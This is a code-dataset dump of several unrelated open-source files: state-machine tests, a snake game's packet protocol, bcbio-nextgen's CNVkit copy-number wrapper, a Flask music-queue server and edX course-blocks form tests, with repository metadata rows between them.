Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
# Note: No state transition occurs between the initial state and when it's saved to the database.
penguin = Penguin(name='Tux')
eq_(penguin.current_state, Penguin.sleeping)
assert penguin.is_sleeping
session.add(penguin)
session.commit()
penguin2 = session.query(Penguin).filter_by(id=penguin.id)[0]
assert penguin2.is_sleeping
###################################################################################
## Mongo Engine Tests
###################################################################################
@requires_mongoengine
@with_setup(clear_mongo_databases, clear_mongo_databases)
def test_mongoengine_state_machine():
@acts_as_state_machine
class Person(mongoengine.Document):
name = mongoengine.StringField(default='Billy')
sleeping = State(initial=True)
running = State()
cleaning = State()
run = Event(from_states=sleeping, to_state=running)
cleanup = Event(from_states=running, to_state=cleaning)
sleep = Event(from_states=(running, cleaning), to_state=sleeping)
@before('sleep')
def do_one_thing(self):
print("{} is sleepy".format(self.name))
@before('sleep')
def do_another_thing(self):
print("{} is REALLY sleepy".format(self.name))
@after('sleep')
def snore(self):
print("Zzzzzzzzzzzz")
@after('sleep')
def snore(self):
print("Zzzzzzzzzzzzzzzzzzzzzz")
establish_mongo_connection()
person = Person()
person.save()
eq_(person.current_state, Person.sleeping)
assert person.is_sleeping
assert not person.is_running
person.run()
assert person.is_running
person.sleep()
assert person.is_sleeping
person.run()
person.save()
assert person.is_running
@requires_mongoengine
@with_setup(clear_mongo_databases, clear_mongo_databases)
def test_invalid_state_transition():
@acts_as_state_machine
class Person(mongoengine.Document):
name = mongoengine.StringField(default='Billy')
sleeping = State(initial=True)
running = State()
cleaning = State()
run = Event(from_states=sleeping, to_state=running)
cleanup = Event(from_states=running, to_state=cleaning)
sleep = Event(from_states=(running, cleaning), to_state=sleeping)
establish_mongo_connection()
person = Person()
person.save()
assert person.is_sleeping
#should raise an invalid state exception
with assert_raises(InvalidStateTransition):
person.sleep()
@requires_mongoengine
@with_setup(clear_mongo_databases, clear_mongo_databases)
def test_before_callback_blocking_transition():
@acts_as_state_machine
class Runner(mongoengine.Document):
name = mongoengine.StringField(default='Billy')
sleeping = State(initial=True)
running = State()
cleaning = State()
run = Event(from_states=sleeping, to_state=running)
cleanup = Event(from_states=running, to_state=cleaning)
sleep = Event(from_states=(running, cleaning), to_state=sleeping)
@before('run')
def check_sneakers(self):
return False
establish_mongo_connection()
runner = Runner()
runner.save()
assert runner.is_sleeping
runner.run()
assert runner.is_sleeping
assert not runner.is_running
if __name__ == "__main__":
nose.run()
| mit | -6,081,339,455,101,649,000 | 27.086538 | 103 | 0.619308 | false |
tobast/sysres-pikern | snake/snake_common.py | 1 | 1643 |
SERVER_PORT = 31412
PSIZE = 20
WIDTH = 30
HEIGHT = 30
PERIOD = 100
def p2add(u, v):
return (u[0] + v[0], u[1] + v[1])
DIRS = [(0, 1), (1, 0), (-1, 0), (0, -1)]
NB_APPLES = 3
class Packet:
def __init__(self, data = b''):
self.start_index = 0
self.data = data
def add_position(self, p):
self.data += bytes((p[0], p[1]))
def add_uint16(self, n):
self.data += bytes(((n >> 8) & 0xff, n & 0xff))
def add_uint8(self, n):
self.data += bytes((n,))
def add_color(self, c):
self.add_uint16(c[0])
self.add_uint16(c[1])
self.add_uint16(c[2])
def add_position_list(self, l):
self.add_uint16(len(l))
for p in l:
self.add_position(p)
def read_position(self):
r = self.data[self.start_index]
s = self.data[self.start_index + 1]
self.start_index += 2
return (r, s)
def read_uint16(self):
r = self.data[self.start_index]
s = self.data[self.start_index + 1]
self.start_index += 2
return (r << 8) | s
def read_uint8(self):
r = self.data[self.start_index]
self.start_index += 1
return r
def read_position_list(self):
l = []
n = self.read_uint16()
for i in range(n):
l.append(self.read_position())
return l
def read_color(self):
r = self.read_uint16()
g = self.read_uint16()
b = self.read_uint16()
return (r, g, b)
TOSERVER_INIT = 0
TOCLIENT_INIT = 1
SET_SNAKE = 2
SET_APPLES = 3
SET_DIRECTION = 4
SET_SNAKE_COLOR = 5
TOCLIENT_ACCESS_DENIED = 6
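# --- usage sketch (illustrative only) ----------------------------------------
# A quick round-trip through the Packet wire format: the writer appends fields
# in order and the reader consumes them in the same order.  The snake body and
# color values are arbitrary examples.
def _example_packet_roundtrip():
    """sketch: encode a snake update and read it back."""
    out = Packet()
    out.add_uint8(SET_SNAKE)
    out.add_position_list([(5, 5), (5, 6), (6, 6)])
    out.add_color((65535, 0, 0))

    inp = Packet(out.data)
    assert inp.read_uint8() == SET_SNAKE
    assert inp.read_position_list() == [(5, 5), (5, 6), (6, 6)]
    assert inp.read_color() == (65535, 0, 0)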
| gpl-3.0 | 71,077,579,929,375,590 | 20.906667 | 55 | 0.522215 | false |
verdurin/bcbio-nextgen | bcbio/structural/cnvkit.py | 1 | 21743 | """Copy number detection with CNVkit with specific support for targeted sequencing.
http://cnvkit.readthedocs.org
"""
import copy
import os
import shutil
import sys
import tempfile
import pybedtools
import numpy as np
import toolz as tz
from bcbio import install, utils
from bcbio.bam import ref
from bcbio.distributed.transaction import file_transaction, tx_tmpdir
from bcbio.heterogeneity import chromhacks
from bcbio.pipeline import datadict as dd
from bcbio.pipeline import config_utils
from bcbio.variation import bedutils, vcfutils
from bcbio.provenance import do
from bcbio.structural import annotate, shared, regions, plot
def run(items, background=None):
"""Detect copy number variations from batched set of samples using CNVkit.
"""
if not background: background = []
return _cnvkit_by_type(items, background)
def _sv_workdir(data):
return utils.safe_makedir(os.path.join(data["dirs"]["work"], "structural",
dd.get_sample_name(data), "cnvkit"))
def _cnvkit_by_type(items, background):
"""Dispatch to specific CNVkit functionality based on input type.
"""
if len(items + background) == 1:
return _run_cnvkit_single(items[0])
elif vcfutils.get_paired_phenotype(items[0]):
return _run_cnvkit_cancer(items, background)
else:
return _run_cnvkit_population(items, background)
def _associate_cnvkit_out(ckout, items):
"""Associate cnvkit output with individual items.
"""
ckout["variantcaller"] = "cnvkit"
ckout = _add_seg_to_output(ckout, items[0])
ckout = _add_gainloss_to_output(ckout, items[0])
ckout = _add_segmetrics_to_output(ckout, items[0])
out = []
for data in items:
ckout = copy.deepcopy(ckout)
ckout = _add_bed_to_output(ckout, data)
# ckout = _add_coverage_bedgraph_to_output(ckout, data)
ckout = _add_cnr_bedgraph_and_bed_to_output(ckout, data)
if "svplots" in dd.get_tools_on(data):
ckout = _add_plots_to_output(ckout, data)
if "sv" not in data:
data["sv"] = []
data["sv"].append(ckout)
out.append(data)
return out
def _run_cnvkit_single(data, background=None):
"""Process a single input file with BAM or uniform background.
"""
work_dir = _sv_workdir(data)
test_bams = [data["align_bam"]]
if background:
background_bams = [x["align_bam"] for x in background]
background_name = os.path.splitext(os.path.basename(background_bams[0]))[0]
else:
background_bams = []
background_name = None
ckout = _run_cnvkit_shared(data, test_bams, background_bams, work_dir,
background_name=background_name)
if not ckout:
return [data]
else:
return _associate_cnvkit_out(ckout, [data])
def _run_cnvkit_cancer(items, background):
"""Run CNVkit on a tumor/normal pair.
"""
paired = vcfutils.get_paired_bams([x["align_bam"] for x in items], items)
work_dir = _sv_workdir(paired.tumor_data)
ckout = _run_cnvkit_shared(paired.tumor_data, [paired.tumor_bam], [paired.normal_bam],
work_dir, background_name=paired.normal_name)
if not ckout:
return items
tumor_data = _associate_cnvkit_out(ckout, [paired.tumor_data])
normal_data = [x for x in items if dd.get_sample_name(x) != paired.tumor_name]
return tumor_data + normal_data
def _run_cnvkit_population(items, background):
"""Run CNVkit on a population of samples.
Tries to calculate background based on case/controls, otherwise uses
a flat background for each sample and calls independently.
"""
assert not background
inputs, background = shared.find_case_control(items)
return [_run_cnvkit_single(data, background)[0] for data in inputs] + \
[_run_cnvkit_single(data, inputs)[0] for data in background]
def _get_cmd():
return os.path.join(os.path.dirname(sys.executable), "cnvkit.py")
def _run_cnvkit_shared(data, test_bams, background_bams, work_dir, background_name=None):
"""Shared functionality to run CNVkit.
"""
ref_file = dd.get_ref_file(data)
raw_work_dir = os.path.join(work_dir, "raw")
out_base = os.path.splitext(os.path.basename(test_bams[0]))[0].split(".")[0]
background_cnn = "%s_background.cnn" % (background_name if background_name else "flat")
files = {"cnr": os.path.join(raw_work_dir, "%s.cnr" % out_base),
"cns": os.path.join(raw_work_dir, "%s.cns" % out_base),
"back_cnn": os.path.join(raw_work_dir, background_cnn)}
if not utils.file_exists(files["cnr"]):
if os.path.exists(raw_work_dir):
shutil.rmtree(raw_work_dir)
with tx_tmpdir(data, work_dir) as tx_work_dir:
cov_interval = dd.get_coverage_interval(data)
raw_target_bed, access_bed = _get_target_access_files(cov_interval, data, work_dir)
# bail out if we ended up with no regions
if not utils.file_exists(raw_target_bed):
return {}
target_bed = annotate.add_genes(raw_target_bed, data)
            # Do not parallelize cnvkit due to current issues with multi-processing
cores = 1
# cores = min(tz.get_in(["config", "algorithm", "num_cores"], data, 1),
# len(test_bams) + len(background_bams))
cmd = [_get_cmd(), "batch"] + \
test_bams + ["-n"] + background_bams + ["-f", ref_file] + \
["--targets", target_bed, "--access", access_bed] + \
["-d", tx_work_dir, "--split", "-p", str(cores),
"--output-reference", os.path.join(tx_work_dir, background_cnn)]
if cov_interval not in ["amplicon", "genome"]:
at_avg, at_min, t_avg = _get_antitarget_size(access_bed, target_bed)
if at_avg:
cmd += ["--antitarget-avg-size", str(at_avg), "--antitarget-min-size", str(at_min),
"--target-avg-size", str(t_avg)]
local_sitelib = os.path.join(install.get_defaults().get("tooldir", "/usr/local"),
"lib", "R", "site-library")
cmd += ["--rlibpath", local_sitelib]
do.run(cmd, "CNVkit batch")
shutil.move(tx_work_dir, raw_work_dir)
for ftype in ["cnr", "cns"]:
if not os.path.exists(files[ftype]):
raise IOError("Missing CNVkit %s file: %s" % (ftype, files[ftype]))
return files
def _get_target_access_files(cov_interval, data, work_dir):
"""Retrieve target and access files based on the type of data to process.
pick targets, anti-targets and access files based on analysis type
http://cnvkit.readthedocs.org/en/latest/nonhybrid.html
"""
base_regions = regions.get_sv_bed(data)
    # if we don't have a configured BED or regions to use for SV calling
if not base_regions:
# For genome calls, subset to regions within 10kb of genes
if cov_interval == "genome":
base_regions = regions.get_sv_bed(data, "transcripts1e4", work_dir)
# Finally, default to the defined variant regions
if not base_regions:
base_regions = dd.get_variant_regions(data)
target_bed = bedutils.merge_overlaps(base_regions, data, out_dir=work_dir)
if cov_interval == "amplicon":
return target_bed, target_bed
elif cov_interval == "genome":
return target_bed, target_bed
else:
access_file = _create_access_file(dd.get_ref_file(data), _sv_workdir(data), data)
return target_bed, access_file
def _add_seg_to_output(out, data):
"""Export outputs to 'seg' format compatible with IGV and GenePattern.
"""
out_file = "%s.seg" % os.path.splitext(out["cns"])[0]
if not utils.file_exists(out_file):
with file_transaction(data, out_file) as tx_out_file:
cmd = [os.path.join(os.path.dirname(sys.executable), "cnvkit.py"), "export",
"seg", "-o", tx_out_file, out["cns"]]
do.run(cmd, "CNVkit export seg")
out["seg"] = out_file
return out
def _add_cnr_bedgraph_and_bed_to_output(out, data):
cnr_file = out["cnr"]
bedgraph_file = cnr_file + ".bedgraph"
if not utils.file_exists(bedgraph_file):
with file_transaction(data, bedgraph_file) as tx_out_file:
cmd = "sed 1d {cnr_file} | cut -f1,2,3,5 > {tx_out_file}"
do.run(cmd.format(**locals()), "Converting cnr to bedgraph format")
out["cnr_bedgraph"] = bedgraph_file
bed_file = cnr_file + ".bed"
if not utils.file_exists(bed_file):
with file_transaction(data, bed_file) as tx_out_file:
cmd = "sed 1d {cnr_file} | cut -f1,2,3,4,5 > {tx_out_file}"
do.run(cmd.format(**locals()), "Converting cnr to bed format")
out["cnr_bed"] = bed_file
return out
def _add_bed_to_output(out, data):
"""Call ploidy and convert into BED representation.
"""
call_file = "%s-call%s" % os.path.splitext(out["cns"])
gender = dd.get_gender(data)
if not utils.file_exists(call_file):
with file_transaction(data, call_file) as tx_call_file:
cmd = [os.path.join(os.path.dirname(sys.executable), "cnvkit.py"), "call",
"--ploidy", str(dd.get_ploidy(data)),
"-o", tx_call_file, out["cns"]]
if gender:
cmd += ["--gender", gender]
if gender.lower() == "male":
cmd += ["--male-reference"]
do.run(cmd, "CNVkit call ploidy")
out_file = "%s.bed" % os.path.splitext(call_file)[0]
if not utils.file_exists(out_file):
with file_transaction(data, out_file) as tx_out_file:
cmd = [os.path.join(os.path.dirname(sys.executable), "cnvkit.py"), "export",
"bed", "--sample-id", dd.get_sample_name(data),
"--ploidy", str(dd.get_ploidy(data)),
"-o", tx_out_file, call_file]
if gender and gender.lower() == "male":
cmd += ["--male-reference"]
do.run(cmd, "CNVkit export BED")
out["call_file"] = call_file
out["vrn_file"] = annotate.add_genes(out_file, data)
return out
def _add_segmetrics_to_output(out, data):
"""Add metrics for measuring reliability of CNV estimates.
"""
out_file = "%s-segmetrics.txt" % os.path.splitext(out["cns"])[0]
if not utils.file_exists(out_file):
with file_transaction(data, out_file) as tx_out_file:
cmd = [os.path.join(os.path.dirname(sys.executable), "cnvkit.py"), "segmetrics",
"--iqr", "--ci", "--pi",
"-s", out["cns"], "-o", tx_out_file, out["cnr"]]
do.run(cmd, "CNVkit segmetrics")
out["segmetrics"] = out_file
return out
def _add_gainloss_to_output(out, data):
"""Add gainloss based on genes, helpful for identifying changes in smaller genes.
"""
out_file = "%s-gainloss.txt" % os.path.splitext(out["cns"])[0]
if not utils.file_exists(out_file):
with file_transaction(data, out_file) as tx_out_file:
cmd = [os.path.join(os.path.dirname(sys.executable), "cnvkit.py"), "gainloss",
"-s", out["cns"], "-o", tx_out_file, out["cnr"]]
do.run(cmd, "CNVkit gainloss")
out["gainloss"] = out_file
return out
def _add_coverage_bedgraph_to_output(out, data):
"""Add BedGraph representation of coverage to the output
"""
out_file = "%s.coverage.bedgraph" % os.path.splitext(out["cns"])[0]
if utils.file_exists(out_file):
out["bedgraph"] = out_file
return out
bam_file = dd.get_align_bam(data)
bedtools = config_utils.get_program("bedtools", data["config"])
samtools = config_utils.get_program("samtools", data["config"])
cns_file = out["cns"]
bed_file = tempfile.NamedTemporaryFile(suffix=".bed", delete=False).name
with file_transaction(data, out_file) as tx_out_file:
cmd = ("sed 1d {cns_file} | cut -f1,2,3 > {bed_file}; "
"{samtools} view -b -L {bed_file} {bam_file} | "
"{bedtools} genomecov -bg -ibam - -g {bed_file} >"
"{tx_out_file}").format(**locals())
do.run(cmd, "CNVkit bedGraph conversion")
os.remove(bed_file)
out["bedgraph"] = out_file
return out
def _add_plots_to_output(out, data):
"""Add CNVkit plots summarizing called copy number values.
"""
out["plot"] = {}
diagram_plot = _add_diagram_plot(out, data)
if diagram_plot:
out["plot"]["diagram"] = diagram_plot
loh_plot = _add_loh_plot(out, data)
if loh_plot:
out["plot"]["loh"] = loh_plot
scatter_plot = _add_scatter_plot(out, data)
if scatter_plot:
out["plot"]["scatter"] = scatter_plot
return out
def _get_larger_chroms(ref_file):
"""Retrieve larger chromosomes, avoiding the smaller ones for plotting.
"""
from scipy.cluster.vq import kmeans, vq
all_sizes = []
for c in ref.file_contigs(ref_file):
all_sizes.append(float(c.size))
all_sizes.sort()
# separate out smaller chromosomes and haplotypes with kmeans
centroids, _ = kmeans(np.array(all_sizes), 2)
idx, _ = vq(np.array(all_sizes), centroids)
little_sizes = tz.first(tz.partitionby(lambda xs: xs[0], zip(idx, all_sizes)))
little_sizes = [x[1] for x in little_sizes]
# create one more cluster with the smaller, removing the haplotypes
centroids2, _ = kmeans(np.array(little_sizes), 2)
idx2, _ = vq(np.array(little_sizes), centroids2)
little_sizes2 = tz.first(tz.partitionby(lambda xs: xs[0], zip(idx2, little_sizes)))
little_sizes2 = [x[1] for x in little_sizes2]
# get any chromosomes not in haplotype/random bin
thresh = max(little_sizes2)
larger_chroms = []
for c in ref.file_contigs(ref_file):
if c.size > thresh:
larger_chroms.append(c.name)
return larger_chroms
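# --- illustrative sketch (not used by the pipeline) ---------------------------
# A reduced version of the clustering idea above, run on synthetic contig
# sizes so the behaviour is easy to inspect: a single kmeans split separates
# chromosome-scale contigs from haplotype/random-scale ones.  The production
# function above refines this with a second pass over the small cluster.
def _example_larger_chrom_filter():
    from scipy.cluster.vq import kmeans, vq
    sizes = np.array([2.5e8, 2.4e8, 1.9e8, 5.0e7, 4.8e7, 2.0e5, 1.5e5, 9.0e4])
    centroids, _ = kmeans(sizes, 2)
    idx, _ = vq(sizes, centroids)
    keep_cluster = idx[np.argmax(sizes)]
    # sizes assigned to the same cluster as the largest contig
    return sizes[idx == keep_cluster]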
def _remove_haplotype_chroms(in_file, data):
"""Remove shorter haplotype chromosomes from cns/cnr files for plotting.
"""
larger_chroms = set(_get_larger_chroms(dd.get_ref_file(data)))
out_file = "%s-chromfilter%s" % utils.splitext_plus(in_file)
if not utils.file_exists(out_file):
with file_transaction(data, out_file) as tx_out_file:
with open(in_file) as in_handle:
with open(tx_out_file, "w") as out_handle:
for line in in_handle:
if line.startswith("chromosome") or line.split()[0] in larger_chroms:
out_handle.write(line)
return out_file
def _add_scatter_plot(out, data):
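    """Add a scatter plot of CNVkit calls restricted to priority regions.
    Returns None when no priority regions are configured for the sample.
    """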
out_file = "%s-scatter.pdf" % os.path.splitext(out["cnr"])[0]
priority_regions = dd.get_priority_regions(data)
if not priority_regions:
return None
priority_bed = plot._prioritize_plot_regions(pybedtools.BedTool(priority_regions), data)
if utils.file_exists(out_file):
return out_file
cnr = _remove_haplotype_chroms(out["cnr"], data)
cns = _remove_haplotype_chroms(out["cns"], data)
with file_transaction(data, out_file) as tx_out_file:
cmd = [_get_cmd(), "scatter", "-s", cns, "-o", tx_out_file, "-l",
priority_bed, cnr]
do.run(cmd, "CNVkit scatter plot")
return out_file
def _cnx_is_empty(in_file):
"""Check if cnr or cns files are empty (only have a header)
"""
with open(in_file) as in_handle:
for i, line in enumerate(in_handle):
if i > 0:
return False
return True
def _add_diagram_plot(out, data):
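    """Add a chromosome diagram plot of copy number calls.
    Returns None when the cnr/cns inputs contain only a header.
    """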
out_file = "%s-diagram.pdf" % os.path.splitext(out["cnr"])[0]
cnr = _remove_haplotype_chroms(out["cnr"], data)
cns = _remove_haplotype_chroms(out["cns"], data)
if _cnx_is_empty(cnr) or _cnx_is_empty(cns):
return None
if not utils.file_exists(out_file):
with file_transaction(data, out_file) as tx_out_file:
cmd = [_get_cmd(), "diagram", "-s", cns,
"-o", tx_out_file, cnr]
gender = dd.get_gender(data)
if gender and gender.lower() == "male":
cmd += ["--male-reference"]
do.run(cmd, "CNVkit diagram plot")
return out_file
def _add_loh_plot(out, data):
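    """Add a loss of heterozygosity (LOH) plot when variant calls are available.
    """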
vrn_files = filter(lambda x: x is not None, [x.get("vrn_file") for x in data.get("variants", [])])
if len(vrn_files) > 0:
out_file = "%s-loh.pdf" % os.path.splitext(out["cnr"])[0]
cns = _remove_haplotype_chroms(out["cns"], data)
if not utils.file_exists(out_file):
with file_transaction(data, out_file) as tx_out_file:
cmd = [_get_cmd(), "loh", "-t", "-s", cns,
"-o", tx_out_file, vrn_files[0]]
do.run(cmd, "CNVkit diagram plot")
return out_file
def _get_antitarget_size(access_file, target_bed):
"""Retrieve anti-target size based on distance between target regions.
Handles smaller anti-target regions like found in subset genomes and tests.
https://groups.google.com/d/msg/biovalidation/0OdeMfQM1CA/S_mobiz3eJUJ
"""
prev = (None, 0)
sizes = []
for region in pybedtools.BedTool(access_file).subtract(target_bed):
prev_chrom, prev_end = prev
if region.chrom == prev_chrom:
sizes.append(region.start - prev_end)
prev = (region.chrom, region.end)
avg_size = np.median(sizes) if len(sizes) > 0 else 0
if len(sizes) < 500 and avg_size < 10000.0: # Default antitarget-min-size
return 1000, 75, 1000
else:
return None, None, None
def _create_access_file(ref_file, out_dir, data):
"""Create genome access file for CNVlib to define available genomic regions.
XXX Can move to installation/upgrade process if too slow here.
"""
out_file = os.path.join(out_dir, "%s-access.bed" % os.path.splitext(os.path.basename(ref_file))[0])
if not utils.file_exists(out_file):
with file_transaction(data, out_file) as tx_out_file:
cmd = [os.path.join(os.path.dirname(sys.executable), "genome2access.py"),
ref_file, "-s", "10000", "-o", tx_out_file]
do.run(cmd, "Create CNVkit access file")
return out_file
# ## Theta support
def export_theta(ckout, data):
"""Provide updated set of data with export information for TheTA2 input.
"""
cns_file = chromhacks.bed_to_standardonly(ckout["cns"], data, headers="chromosome")
cnr_file = chromhacks.bed_to_standardonly(ckout["cnr"], data, headers="chromosome")
out_file = "%s-theta.input" % utils.splitext_plus(cns_file)[0]
if not utils.file_exists(out_file):
with file_transaction(data, out_file) as tx_out_file:
cmd = [_get_cmd(), "export", "theta", cns_file, cnr_file, "-o", tx_out_file]
do.run(cmd, "Export CNVkit calls as inputs for TheTA2")
# ckout["theta_input"] = _subset_theta_to_calls(out_file, ckout, data)
ckout["theta_input"] = out_file
return ckout
def _subset_theta_to_calls(in_file, ckout, data):
"""Subset CNVkit regions to provide additional signal for THetA.
THetA has default assumptions about lengths of calls and finding
useful signal in longer regions. We adjust for this by subsetting
calls to a range around the most useful signal.
"""
tn_ratio = 0.9
keep_background = False
out_file = "%s-cnvsize%s" % utils.splitext_plus(in_file)
if not utils.file_uptodate(out_file, in_file):
call_sizes = []
calls = set([])
with open(ckout["vrn_file"]) as in_handle:
for line in in_handle:
chrom, start, end, _, count = line.split()[:5]
if max([int(x) for x in count.split(",")]) < 6:
call_sizes.append((int(end) - int(start)))
calls.add((chrom, start, end))
keep_min = np.percentile(call_sizes, 10)
keep_max = np.percentile(call_sizes, 90)
with file_transaction(data, out_file) as tx_out_file:
with open(tx_out_file, "w") as out_handle:
# Pull out calls that have tumor/normal differences
tn_count = 0
with open(in_file) as in_handle:
for line in in_handle:
if line.startswith("#"):
out_handle.write(line)
else:
key = tuple(line.split()[1:4])
sizes = [float(x) for x in line.split()[4:6]]
size = int(key[2]) - int(key[1])
if size >= keep_min and size <= keep_max:
if (min(sizes) / max(sizes)) < tn_ratio:
tn_count += 1
out_handle.write(line)
if keep_background:
# Pull out equal number of background calls
no_tn_count = 0
with open(in_file) as in_handle:
for line in in_handle:
if not line.startswith("#"):
key = tuple(line.split()[1:4])
sizes = [float(x) for x in line.split()[4:6]]
size = int(key[2]) - int(key[1])
if size >= keep_min and size <= keep_max:
if no_tn_count < tn_count and (min(sizes) / max(sizes)) > tn_ratio:
no_tn_count += 1
out_handle.write(line)
return out_file
| mit | 399,970,227,852,909,060 | 43.103448 | 103 | 0.589109 | false |
tietokilta-saato/tikplay | tikplay/server.py | 1 | 5529 | import json
import os
from hashlib import sha1
from flask import request, jsonify, current_app
from flask.ext.restful import Resource
import time
from werkzeug.utils import secure_filename
import traceback
from audio import play_file
from provider.provider import Provider
from provider.task import TaskState
from utils import is_uri, is_url
__version__ = 'v1.0'
url_base = '/srv/{}'.format(__version__)
ALLOWED_EXTENSIONS = {'mp3', 'ogg', 'wav'}
class File(Resource):
def __allowed_file(self, file):
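        """Check that the uploaded file has an allowed audio extension."""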
return file.filename.split('.')[-1].lower() in ALLOWED_EXTENSIONS
def post(self):
"""
POST a new song to save
"""
file = request.files['file']
filename = secure_filename(file.filename)
if file and self.__allowed_file(file):
calced_hash = sha1(file.stream.read()).hexdigest()
file.stream.seek(0)
_filename = "{}.{}".format(calced_hash, file.filename.split('.')[-1])
if not _filename.endswith(".mp3"):
_filename += ".mp3"
file.save(os.path.join(current_app.config['UPLOAD_FOLDER'], _filename))
current_app.config['audio_api'].update()
time.sleep(2.0) # Whoo, ugly hacks
return jsonify(filename=filename, saved=True, key="sha1:" + calced_hash,
text="File successfully saved as {}. Use this as key to play this file".format(calced_hash))
elif not self.__allowed_file(file):
return jsonify(filename=filename, saved=False,
text="Filetype not allowed! (allowed: {})".format(", ".join(ALLOWED_EXTENSIONS)))
else:
return jsonify(filename="", saved=False,
text="You have to send a file, e.g. curl -X POST -F file=\"@<file>\" <server_address>")
class Queue(Resource):
def get(self, length=10):
"""
GET the now_playing queue
"""
audio_api = current_app.config['audio_api']
return jsonify(text=audio_api.now_playing(queue_length=length))
def delete(self):
audio_api = current_app.config['audio_api']
return jsonify(text=audio_api.kill())
class Song(Resource):
def __init__(self):
        super(Song, self).__init__()
self.prov = Provider(conf={'download_dir': current_app.config['song_dir']})
self.cache = current_app.config['cache_handler']
def get(self):
"""
GET now playing song
"""
audio_api = current_app.config['audio_api']
return jsonify(text=audio_api.now_playing(queue_length=1))
def delete(self):
"""
DELETE now playing song (i.e. skip a song)
"""
audio_api = current_app.config['audio_api']
return jsonify(text=audio_api.next_())
def post(self):
"""
POST a new song to play by URI/URL.
"""
try:
data = json.loads(request.data.decode())
except ValueError:
return jsonify(error=True, text="Invalid JSON given")
uri = data["url"]
if not uri:
return jsonify(error=True, text="Invalid URI")
if is_url(uri):
uri = self.prov.canonicalize(uri)
elif not is_uri(uri):
return jsonify(error=True, text="Invalid URI")
audio_api = current_app.config['audio_api']
fn = self.cache.get_song(uri)
if fn is not None:
return play_file(
audio_api, current_app.config['songlogger'], fn, data.get("filename", uri), user=data["user"]
)
try:
task = self.prov.get(uri)
except ValueError:
return jsonify(error=True, text="No provider found for " + uri)
if task.state == TaskState.exception:
return jsonify(error=True, text=traceback.format_exception_only(type(task.exception), task.exception))
task.metadata['user'] = data.get('user', 'anonymous')
task.metadata['original_filename'] = data.get('filename', uri)
with current_app.config['task_lock']:
current_app.config['task_dict'][task.id] = task
return jsonify(error=False, task=task.id, text="Task received, fetching song")
class Task(Resource):
def get(self, id_):
"""
GET information about a task.
:param id_: Task ID
:return:
"""
task = current_app.config['task_dict'].get(int(id_), None)
if task is None:
return jsonify(error=True, text="Task not found")
return jsonify(id=task.id, state=task.state, url=task.url)
class Find(Resource):
def get(self, find_type, find_key):
"""
GET find a song from the database.
Keyword arguments:
find_type: valid values 1 (song_hash), 2 (artist), 3 (title), 4 (length), 5 (filename)
find_key: value corresponding to the type: 1 (SHA1), 2 (String),
3 (String), 4 (Integer (seconds)), 5 (filename)
"""
methods = ['song_hash', 'artist', 'title', 'length', 'filename']
cache_handler = current_app.config['cache_handler']
# find_type is ints from 1 - 5, list indices are ints from 0 - 4
found = cache_handler.find(methods[find_type - 1], find_key)
if found is not None:
return jsonify(find_type=methods[find_type - 1], find_key=find_key, found=True, text=str(found))
else:
return jsonify(find_type=methods[find_type - 1], find_key=find_key, found=False)
| mit | 5,394,548,310,711,186,000 | 33.773585 | 119 | 0.584012 | false |
jolyonb/edx-platform | lms/djangoapps/course_api/blocks/tests/test_forms.py | 1 | 8460 | """
Tests for Course Blocks forms
"""
from urllib import urlencode
import ddt
from django.http import Http404, QueryDict
from opaque_keys.edx.locator import CourseLocator
from rest_framework.exceptions import PermissionDenied
from openedx.core.djangoapps.util.test_forms import FormTestMixin
from student.models import CourseEnrollment
from student.tests.factories import CourseEnrollmentFactory, UserFactory
from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
from ..forms import BlockListGetForm
@ddt.ddt
class TestBlockListGetForm(FormTestMixin, SharedModuleStoreTestCase):
"""
Tests for BlockListGetForm
"""
FORM_CLASS = BlockListGetForm
@classmethod
def setUpClass(cls):
super(TestBlockListGetForm, cls).setUpClass()
cls.course = CourseFactory.create()
def setUp(self):
super(TestBlockListGetForm, self).setUp()
self.student = UserFactory.create()
self.student2 = UserFactory.create()
self.staff = UserFactory.create(is_staff=True)
CourseEnrollmentFactory.create(user=self.student, course_id=self.course.id)
CourseEnrollmentFactory.create(user=self.student2, course_id=self.course.id)
usage_key = self.course.location
self.initial = {'requesting_user': self.student}
self.form_data = QueryDict(
urlencode({
'username': self.student.username,
'usage_key': unicode(usage_key),
}),
mutable=True,
)
self.cleaned_data = {
'all_blocks': None,
'block_counts': set(),
'depth': 0,
'nav_depth': None,
'return_type': 'dict',
'requested_fields': {'display_name', 'type'},
'student_view_data': set(),
'usage_key': usage_key,
'username': self.student.username,
'user': self.student,
'block_types_filter': set(),
}
def assert_raises_permission_denied(self):
"""
Fail unless permission is denied to the form
"""
with self.assertRaises(PermissionDenied):
self.get_form(expected_valid=False)
def assert_raises_not_found(self):
"""
Fail unless a 404 occurs
"""
with self.assertRaises(Http404):
self.get_form(expected_valid=False)
def assert_equals_cleaned_data(self):
"""
Check that the form returns the expected data
"""
form = self.get_form(expected_valid=True)
self.assertDictEqual(form.cleaned_data, self.cleaned_data)
def test_basic(self):
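        """A request with the default form data returns the expected cleaned data."""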
self.assert_equals_cleaned_data()
#-- usage key
def test_no_usage_key_param(self):
self.form_data.pop('usage_key')
self.assert_error('usage_key', "This field is required.")
def test_invalid_usage_key(self):
self.form_data['usage_key'] = 'invalid_usage_key'
self.assert_error('usage_key', "'invalid_usage_key' is not a valid usage key.")
def test_non_existent_usage_key(self):
self.form_data['usage_key'] = self.store.make_course_usage_key(CourseLocator('non', 'existent', 'course'))
self.assert_raises_permission_denied()
#-- user
@ddt.data("True", "true", True)
def test_no_user_all_blocks_true(self, all_blocks_value):
self.initial = {'requesting_user': self.staff}
self.form_data.pop('username')
self.form_data['all_blocks'] = all_blocks_value
self.get_form(expected_valid=True)
@ddt.data("False", "false", False)
def test_no_user_all_blocks_false(self, all_blocks_value):
self.initial = {'requesting_user': self.staff}
self.form_data.pop('username')
self.form_data['all_blocks'] = all_blocks_value
self.assert_error('username', "This field is required unless all_blocks is requested.")
def test_no_user_all_blocks_none(self):
self.initial = {'requesting_user': self.staff}
self.form_data.pop('username')
self.assert_error('username', "This field is required unless all_blocks is requested.")
def test_no_user_non_staff(self):
self.form_data.pop('username')
self.form_data['all_blocks'] = True
self.assert_raises_permission_denied()
def test_nonexistent_user_by_student(self):
self.form_data['username'] = 'non_existent_user'
self.assert_raises_permission_denied()
def test_nonexistent_user_by_staff(self):
self.initial = {'requesting_user': self.staff}
self.form_data['username'] = 'non_existent_user'
self.assert_raises_not_found()
def test_other_user_by_student(self):
self.form_data['username'] = self.student2.username
self.assert_raises_permission_denied()
